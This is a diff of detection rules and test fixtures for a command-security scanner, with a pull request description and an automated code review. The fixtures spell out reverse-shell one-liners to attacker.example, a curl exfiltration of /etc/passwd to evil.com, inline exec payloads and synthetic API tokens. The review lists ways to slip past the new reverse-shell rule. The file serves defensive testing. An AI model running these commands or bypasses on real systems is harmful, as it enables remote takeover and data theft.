-    PsSetExecutionPolicyBypass, PsDefenderExclusion, PsInlineDownloadExecute, DynamicCodeExecution,
+    PsSetExecutionPolicyBypass, PsDefenderExclusion, PsInlineDownloadExecute,
+    // PR3 — LOTL command rules
+    ReverseShell, InterpreterSuspiciousInlineExec,
+    DynamicCodeExecution,
     ObfuscatedPayload, SuspiciousCodeExfiltration, ProxyEnvSet, SensitiveEnvExport,
     CodeInjectionEnv, InterpreterHijackEnv, ShellInjectionEnv, MetadataEndpoint,
     PrivateNetworkAccess, CommandNetworkDeny, ConfigInjection, ConfigSuspiciousIndicator,
@@ -1391,54 +1397,56 @@ fn test_no_url_rules_have_no_url_fixtures() {
     let no_url_rules: HashSet<&str> = [
         "dotfile_overwrite",
         "archive_extract",
-        "pipe_to_interpreter",             // cat script | bash
-        "bidi_controls",                   // exec context, no URL needed
-        "zero_width_chars",                // exec context, no URL needed
-        "unicode_tags",                    // byte-level, no URL needed
-        "invisible_math_operator",         // byte-level, no URL needed
-        "invisible_whitespace",            // byte-level, no URL needed
-        "proc_mem_access",                 // /proc/*/mem access, no URL needed
-        "credential_file_sweep",           // multi-credential file access, no URL needed
-        "code_injection_env",              // export LD_PRELOAD=, no URL needed
-        "shell_injection_env",             // export BASH_ENV=, no URL needed
-        "interpreter_hijack_env",          // export PYTHONPATH=, no URL needed
-        "sensitive_env_export",            // export OPENAI_API_KEY=, no URL needed
-        "config_injection",                // file context, no URL needed
-        "config_non_ascii",                // file context, no URL needed
-        "config_invisible_unicode",        // file context, no URL needed
-        "mcp_suspicious_args",             // file context, no URL needed
-        "mcp_overly_permissive",           // file context, no URL needed
-        "mcp_duplicate_server_name",       // file context, no URL needed
-        "mcp_server_drift",                // mcp.lock FileScan, no URL needed
-        "metadata_endpoint",               // bare IP: curl 169.254.169.254/path
-        "private_network_access",          // bare IP: curl 10.0.0.1/path
-        "credential_in_text",              // token/key in text, no URL needed
-        "high_entropy_secret",             // high-entropy secret assignment, no URL needed
-        "private_key_exposed",             // PEM key block, no URL needed
-        "base64_decode_execute",           // base64 decode chain, no URL needed
-        "wrapper_chain_too_deep",          // cat x | <32+ nested env -S/sudo> bash, no URL needed
-        "data_exfiltration",               // curl -d @/etc/passwd evil.com, schemeless
-        "unsigned_repo_trust",             // apt --allow-unauthenticated, no URL needed
-        "gpg_check_disabled",              // dnf --nogpgcheck, no URL needed
-        "dynamic_code_execution",          // file scan, no URL needed
-        "obfuscated_payload",              // file scan, no URL needed
-        "suspicious_code_exfiltration",    // file scan, no URL needed
-        "hangul_filler",                   // byte-level, no URL needed
-        "confusable_text",                 // byte-level, no URL needed
-        "workflow_unpinned_action",        // CI workflow file scan, no URL needed
-        "workflow_dangerous_trigger",      // CI workflow file scan, no URL needed
-        "workflow_curl_pipe_shell",        // CI workflow file scan, no URL needed
-        "workflow_untrusted_input",        // CI workflow file scan, no URL needed
-        "workflow_excessive_permissions",  // CI workflow file scan, no URL needed
-        "workflow_run_trigger",            // CI workflow file scan, no URL needed
+        "pipe_to_interpreter",                // cat script | bash
+        "bidi_controls",                      // exec context, no URL needed
+        "zero_width_chars",                   // exec context, no URL needed
+        "unicode_tags",                       // byte-level, no URL needed
+        "invisible_math_operator",            // byte-level, no URL needed
+        "invisible_whitespace",               // byte-level, no URL needed
+        "proc_mem_access",                    // /proc/*/mem access, no URL needed
+        "credential_file_sweep",              // multi-credential file access, no URL needed
+        "code_injection_env",                 // export LD_PRELOAD=, no URL needed
+        "shell_injection_env",                // export BASH_ENV=, no URL needed
+        "interpreter_hijack_env",             // export PYTHONPATH=, no URL needed
+        "sensitive_env_export",               // export OPENAI_API_KEY=, no URL needed
+        "config_injection",                   // file context, no URL needed
+        "config_non_ascii",                   // file context, no URL needed
+        "config_invisible_unicode",           // file context, no URL needed
+        "mcp_suspicious_args",                // file context, no URL needed
+        "mcp_overly_permissive",              // file context, no URL needed
+        "mcp_duplicate_server_name",          // file context, no URL needed
+        "mcp_server_drift",                   // mcp.lock FileScan, no URL needed
+        "metadata_endpoint",                  // bare IP: curl 169.254.169.254/path
+        "private_network_access",             // bare IP: curl 10.0.0.1/path
+        "credential_in_text",                 // token/key in text, no URL needed
+        "high_entropy_secret",                // high-entropy secret assignment, no URL needed
+        "private_key_exposed",                // PEM key block, no URL needed
+        "base64_decode_execute",              // base64 decode chain, no URL needed
+        "wrapper_chain_too_deep", // cat x | <32+ nested env -S/sudo> bash, no URL needed
+        "data_exfiltration",      // curl -d @/etc/passwd evil.com, schemeless
+        "reverse_shell",          // nc -e /bin/sh host port, no URL needed
+        "interpreter_suspicious_inline_exec", // python -c 'subprocess...', no URL needed
+        "unsigned_repo_trust",    // apt --allow-unauthenticated, no URL needed
+        "gpg_check_disabled",     // dnf --nogpgcheck, no URL needed
+        "dynamic_code_execution", // file scan, no URL needed
+        "obfuscated_payload",     // file scan, no URL needed
+        "suspicious_code_exfiltration", // file scan, no URL needed
+        "hangul_filler",          // byte-level, no URL needed
+        "confusable_text",        // byte-level, no URL needed
+        "workflow_unpinned_action", // CI workflow file scan, no URL needed
+        "workflow_dangerous_trigger", // CI workflow file scan, no URL needed
+        "workflow_curl_pipe_shell", // CI workflow file scan, no URL needed
+        "workflow_untrusted_input", // CI workflow file scan, no URL needed
+        "workflow_excessive_permissions", // CI workflow file scan, no URL needed
+        "workflow_run_trigger",   // CI workflow file scan, no URL needed
         "workflow_checkout_untrusted_ref", // CI workflow file scan, no URL needed
-        "workflow_cache_poisoning",        // CI workflow file scan, no URL needed
-        "dockerfile_unpinned_image",       // Dockerfile scan, no URL needed
-        "package_script_dangerous",        // package.json scan, no URL needed
-        "notebook_hidden_content",         // .ipynb scan, no URL needed
-        "notebook_suspicious_output",      // .ipynb scan, no URL needed
-        "agent_instruction_hidden",        // AI-instruction file scan, no URL needed
-        "svg_script_embedded",             // SVG scan, no URL needed
+        "workflow_cache_poisoning", // CI workflow file scan, no URL needed
+        "dockerfile_unpinned_image", // Dockerfile scan, no URL needed
+        "package_script_dangerous", // package.json scan, no URL needed
+        "notebook_hidden_content", // .ipynb scan, no URL needed
+        "notebook_suspicious_output", // .ipynb scan, no URL needed
+        "agent_instruction_hidden", // AI-instruction file scan, no URL needed
+        "svg_script_embedded",    // SVG scan, no URL needed
         // M8 ch5 — container-runtime rules fire without a URL in the input.
         "docker_run_privileged",           // docker run --privileged alpine
         "docker_run_sensitive_bind_mount", // docker run -v /var/run/docker.sock:...

--- a/tests/fixtures/command.toml
+++ b/tests/fixtures/command.toml
@@ -1515,6 +1515,164 @@ context = "exec"
 expected_action = "allow"
 expected_rules = []
 
+# ── PR3: LOTL — reverse shells (Atomic Red Team-derived, MIT corpus) ────────
+# Fixtures encode techniques catalogued in the Atomic Red Team project (MIT,
+# https://github.com/redcanaryco/atomic-red-team); no rule text is copied.
+
+[[fixture]]
+name = "rev_shell_bash_dev_tcp"
+min_milestone = 1
+input = "bash -i >& /dev/tcp/attacker.example/4444 0>&1"
+context = "exec"
+expected_action = "block"
+expected_rules = ["reverse_shell"]
+forbidden_rules = ["interpreter_suspicious_inline_exec", "pipe_to_interpreter"]
+
+[[fixture]]
+name = "rev_shell_nc_e"
+min_milestone = 1
+input = "nc -e /bin/sh attacker.example 4444"
+context = "exec"
+expected_action = "block"
+expected_rules = ["reverse_shell"]
+forbidden_rules = ["interpreter_suspicious_inline_exec"]
+
+[[fixture]]
+name = "rev_shell_ncat_exec"
+min_milestone = 1
+input = "ncat --exec /bin/bash attacker.example 4444"
+context = "exec"
+expected_action = "block"
+expected_rules = ["reverse_shell"]
+
+[[fixture]]
+name = "rev_shell_nc_flag_after_host"
+min_milestone = 1
+input = "nc attacker.example 4444 -e /bin/sh"
+context = "exec"
+expected_action = "block"
+expected_rules = ["reverse_shell"]
+
+[[fixture]]
+name = "rev_shell_socat_exec"
+min_milestone = 1
+input = "socat TCP:attacker.example:4444 EXEC:/bin/sh"
+context = "exec"
+expected_action = "block"
+expected_rules = ["reverse_shell"]
+
+# Boundary: a plain nc connectivity check (no exec flag) must NOT fire.
+[[fixture]]
+name = "nc_connectivity_check_no_fire"
+min_milestone = 1
+input = "nc -zv example.com 443"
+context = "exec"
+expected_action = "allow"
+expected_rules = []
+forbidden_rules = ["reverse_shell"]
+
+# ── PR3: LOTL — inline interpreter with suspicious payload ──────────────────
+
+[[fixture]]
+name = "py_inline_subprocess_shell"
+min_milestone = 1
+input = "python3 -c 'import subprocess; subprocess.call([\"/bin/sh\",\"-i\"])'"
+context = "exec"
+expected_action = "block"
+expected_rules = ["interpreter_suspicious_inline_exec"]
+forbidden_rules = ["reverse_shell"]
+
+[[fixture]]
+name = "py_inline_os_system"
+min_milestone = 1
+input = "python3 -c 'import os; os.system(\"id\")'"
+context = "exec"
+expected_action = "block"
+expected_rules = ["interpreter_suspicious_inline_exec"]
+
+[[fixture]]
+name = "node_inline_child_process"
+min_milestone = 1
+input = "node -e 'require(\"child_process\").execSync(\"id\")'"
+context = "exec"
+expected_action = "block"
+expected_rules = ["interpreter_suspicious_inline_exec"]
+
+[[fixture]]
+name = "perl_inline_system"
+min_milestone = 1
+input = "perl -e 'system(\"id\")'"
+context = "exec"
+expected_action = "block"
+expected_rules = ["interpreter_suspicious_inline_exec"]
+
+[[fixture]]
+name = "php_inline_system"
+min_milestone = 1
+input = "php -r 'system(\"id\");'"
+context = "exec"
+expected_action = "block"
+expected_rules = ["interpreter_suspicious_inline_exec"]
+
+# Non-base64 decode-execute (hex): owned by this rule, NOT base64_decode_execute.
+[[fixture]]
+name = "py_inline_hex_decode_exec"
+min_milestone = 1
+input = "python3 -c 'exec(bytes.fromhex(\"6f732e73797374656d2827696427290a\").decode())'"
+context = "exec"
+expected_action = "block"
+expected_rules = ["interpreter_suspicious_inline_exec"]
+forbidden_rules = ["base64_decode_execute"]
+
+# Interpreter socket reverse shell classifies here, not as reverse_shell.
+[[fixture]]
+name = "py_inline_socket_reverse_shell"
+min_milestone = 1
+input = "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"attacker.example\",4444));os.dup2(s.fileno(),0);subprocess.call([\"/bin/sh\",\"-i\"])'"
+context = "exec"
+expected_action = "block"
+expected_rules = ["interpreter_suspicious_inline_exec"]
+forbidden_rules = ["reverse_shell"]
+
+# Dedup boundary: the base64 decode-execute shape stays owned by
+# base64_decode_execute; the inline-exec rule must NOT double-fire on it.
+[[fixture]]
+name = "b64_inline_owned_by_base64_rule"
+min_milestone = 1
+input = "python3 -c \"exec(__import__('base64').b64decode('aWQ='))\""
+context = "exec"
+expected_action = "block"
+expected_rules = ["base64_decode_execute"]
+forbidden_rules = ["interpreter_suspicious_inline_exec"]
+
+# Boundary: benign inline one-liners (no exec/spawn/socket/network) must NOT fire.
+[[fixture]]
+name = "py_inline_print_no_fire"
+min_milestone = 1
+input = "python3 -c 'print(1)'"
+context = "exec"
+expected_action = "allow"
+expected_rules = []
+forbidden_rules = ["interpreter_suspicious_inline_exec"]
+
+[[fixture]]
+name = "py_inline_json_load_no_fire"
+min_milestone = 1
+input = "python -c 'import json,sys; json.load(sys.stdin)'"
+context = "exec"
+expected_action = "allow"
+expected_rules = []
+forbidden_rules = ["interpreter_suspicious_inline_exec"]
+
+[[fixture]]
+name = "node_inline_console_log_no_fire"
+min_milestone = 1
+input = "node -e 'console.log(1+1)'"
+context = "exec"
+expected_action = "allow"
+expected_rules = []
+forbidden_rules = ["interpreter_suspicious_inline_exec"]
+
 # ── M5 chunk 1: PowerShell-specific rules ───────────────────────────────
 
 [[fixture]]

--- a/tests/fixtures/credential.toml
+++ b/tests/fixtures/credential.toml
@@ -77,3 +77,43 @@ input = "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE"
 context = "exec"
 expected_action = "block"
 expected_rules = ["sensitive_env_export"]
+
+# ── PR3: additional high-value credential providers ────────────────────────
+
+# OpenAI project-scoped key (sk-proj-…). Synthetic value matching the regex.
+[[fixture]]
+name = "openai_project_key_in_paste"
+min_milestone = 1
+input = "sk-proj-aB3xK9mP2qR7tV1wY5zC4dF8gH6jL0nQsT2uW4xZ0"
+context = "paste"
+expected_action = "block"
+expected_rules = ["credential_in_text"]
+
+# Hugging Face access token (hf_…).
+[[fixture]]
+name = "huggingface_token_in_paste"
+min_milestone = 1
+input = "hf_QWERTYuiop1234567890ASDFGHjklZXCVBN"
+context = "paste"
+expected_action = "block"
+expected_rules = ["credential_in_text"]
+
+# PyPI upload token (shared macaroon prefix pypi-AgEIcHlwaS5vcmc…).
+[[fixture]]
+name = "pypi_upload_token_in_paste"
+min_milestone = 1
+input = "pypi-AgEIcHlwaS5vcmcAgQ1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP"
+context = "paste"
+expected_action = "block"
+expected_rules = ["credential_in_text"]
+
+# PGP private key block — distinct from the PEM `private_key` pattern (which
+# requires `PRIVATE KEY-----`, not `PRIVATE KEY BLOCK-----`). Fires the same
+# PrivateKeyExposed rule at Critical.
+[[fixture]]
+name = "pgp_private_key_block"
+min_milestone = 1
+input = "-----BEGIN PGP PRIVATE KEY BLOCK-----\nlQdGBF3xVb0BEADXabc123\n-----END PGP PRIVATE KEY BLOCK-----"
+context = "paste"
+expected_action = "block"
+expected_rules = ["private_key_exposed"]


### PR DESCRIPTION
## What this is

Adds only proven-missing living-off-the-land command rules (fixture-first, narrowly scoped to avoid false positives) plus a selective set of high-value credential providers. No broad duplicates: every candidate was added only after a fixture proved no existing rule fired. Atomic Red Team was the LOTL corpus (MIT, attributed); LOLBAS and GTFOBins are GPL and were treated as reference-only (ideas, never vendored data).

## Credentials (assets/data/credential_patterns.toml)

Added: openai (`sk-proj-`), huggingface (`hf_`), pypi (macaroon `pypi-` prefix), and pgp_private_key (`-----BEGIN PGP PRIVATE KEY BLOCK-----`, Critical). Skipped as genuine duplicates: github app tokens `ghu_`/`ghs_` (already matched by the github_pat class), and OpenSSH keys (already matched by the PEM regex).

Bug fix found in the process: credential.rs `check_private_keys` used `.first()` and so only ever ran the first private-key pattern; it now iterates all patterns (PRIVATE_KEY_RES: Vec<Regex>), so the new PGP pattern actually fires while PEM still fires once. Covered by tests.

## LOTL (rules/command.rs)

Two fixture-proven new RuleIds, both scoped to a suspicious payload so benign use never fires:

- **ReverseShell**: `/dev/tcp` and `/dev/udp` redirects, `nc`/`ncat`/`netcat -e`, `socat ... EXEC:`.
- **InterpreterSuspiciousInlineExec**: an inline interpreter (`python -c`, `perl -e`, `ruby -e`, `php -r`, `node -e`, `powershell -Command`) AND a suspicious-payload predicate (network fetch, reverse shell, eval/exec, subprocess, credential-file access, decode-to-exec). A bare `python -c 'print(1)'` never fires. Deduped against Base64DecodeExecute, PipeToInterpreter, and the powershell rules via forbidden_rules. Non-base64 decode-to-shell pipes were already covered, so no rule was added there.

Both are Exec/Paste context, so tier-1 PATTERN_TABLE fragments (superset of the tier-3 regex) were added, plus the scoring.rs and output_filter.rs explicit arms.

## Tests

command 131/131, credential 34/34 (PGP fires, PEM fires once, openai), golden fixtures 41/41 including the tier-1-does-not-gate safeguard.

## Stack

PR3 of the series, stacked on #171 (base: `security/cicd-detect`). Two commits: credentials then LOTL. Full gate green: fmt --check, clippy -D warnings (stable and 1.83), test --workspace (1.83), cargo deny check.

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

This PR expands credential and command threat detection. The main changes are:

- Adds OpenAI, Hugging Face, PyPI, and PGP credential patterns.
- Evaluates every configured private-key pattern.
- Detects reverse-shell and suspicious inline-interpreter commands.
- Registers the new rules in scoring, filtering, explanations, and fixtures.

<h3>Confidence Score: 4/5</h3>

The reverse-shell detection path needs fixes before merging.

- Wrapped `nc` and `socat` commands can avoid the new rule.
- An attached netcat exec argument can avoid the new rule.
- Benign `/dev/tcp` redirects can be blocked as reverse shells.
- Credential and rule-registration changes have strong consistency checks.

crates/tirith-core/src/rules/command.rs

<details open><summary><h3>Security Review</h3></summary>

The reverse-shell rule can be bypassed with common command wrappers or an attached netcat exec argument. Its `/dev/tcp` check also blocks benign network redirects without requiring shell execution.
</details>

<h3>Important Files Changed</h3>

| Filename | Overview |
|----------|----------|
| crates/tirith-core/src/rules/command.rs | Adds both command detectors, but reverse-shell matching misses wrapped and attached-argument forms and over-classifies network redirects. |
| crates/tirith-core/src/rules/credential.rs | Updates private-key detection to evaluate all configured patterns and adds focused tests. |
| crates/tirith-core/assets/data/credential_patterns.toml | Adds provider-specific credential patterns and full-block PGP redaction. |
| crates/tirith-core/build.rs | Adds tier-1 command fragments and generated rule mappings. |
| crates/tirith-core/src/verdict.rs | Adds the reverse-shell and suspicious inline-interpreter rule identifiers. |

<a href="https://app.greptile.com/ide/claude-code?prompt=Fix%20the%20following%203%20code%20review%20issues.%20Work%20through%20them%20one%20at%20a%20time%2C%20proposing%20concise%20fixes.%0A%0A---%0A%0A%23%23%23%20Issue%201%20of%203%0Acrates%2Ftirith-core%2Fsrc%2Frules%2Fcommand.rs%3A3034-3035%0A**Command%20Wrappers%20Bypass%20Detection**%0A%0AWhen%20a%20reverse-shell%20tool%20runs%20through%20a%20supported%20wrapper%2C%20such%20as%20%60env%20nc%20-e%20%2Fbin%2Fsh%20attacker.example%204444%60%20or%20%60sudo%20socat%20TCP%3Ahost%3A4444%20EXEC%3A%2Fbin%2Fsh%60%2C%20%60seg.command%60%20is%20the%20wrapper.%20This%20branch%20never%20resolves%20the%20effective%20command%2C%20so%20the%20input%20passes%20tier%201%20but%20produces%20no%20%60ReverseShell%60%20finding.%0A%0A%23%23%23%20Issue%202%20of%203%0Acrates%2Ftirith-core%2Fsrc%2Frules%2Fcommand.rs%3A3036-3042%0A**Attached%20Exec%20Argument%20Is%20Missed**%0A%0ANetcat%20accepts%20its%20required%20option%20argument%20in%20an%20attached%20form%2C%20so%20%60nc%20-e%2Fbin%2Fsh%20attacker.example%204444%60%20reaches%20this%20rule%20with%20%60-e%2Fbin%2Fsh%60%20as%20one%20argument.%20The%20exact-token%20comparison%20rejects%20it%20and%20the%20reverse%20shell%20produces%20no%20finding.%0A%0A%23%23%23%20Issue%203%20of%203%0Acrates%2Ftirith-core%2Fsrc%2Frules%2Fcommand.rs%3A3029%0A**Network%20Redirect%20Misclassified%20As%20Shell**%0A%0AA%20%60%2Fdev%2Ftcp%2F%60%20or%20%60%2Fdev%2Fudp%2F%60%20reference%20does%20not%20by%20itself%20create%20a%20reverse%20shell.%20Legitimate%20Bash%20probes%20such%20as%20%60bash%20-c%20'echo%20%3E%20%2Fdev%2Ftcp%2Fexample.com%2F443'%60%20satisfy%20this%20condition%20and%20are%20blocked%20as%20a%20High-severity%20reverse%20shell%20even%20though%20they%20neither%20execute%20a%20shell%20nor%20connect%20its%20standard%20streams.%0A%0A&repo=sheeki03%2Ftirith&pr=172&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaudeDark.svg?v=6"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaude.svg?v=6"><img alt="Fix All in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixAllInClaude.svg?v=6"></picture></a>

<sub>Reviews (1): Last reviewed commit: ["feat(command): detect reverse shells and..."](https://github.com/sheeki03/tirith/commit/bb95bd405cf8ba9771c41bc0afed910d0782dce0) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=44742488)</sub>

> Greptile also left **3 inline comments** on this PR.

<!-- /greptile_comment -->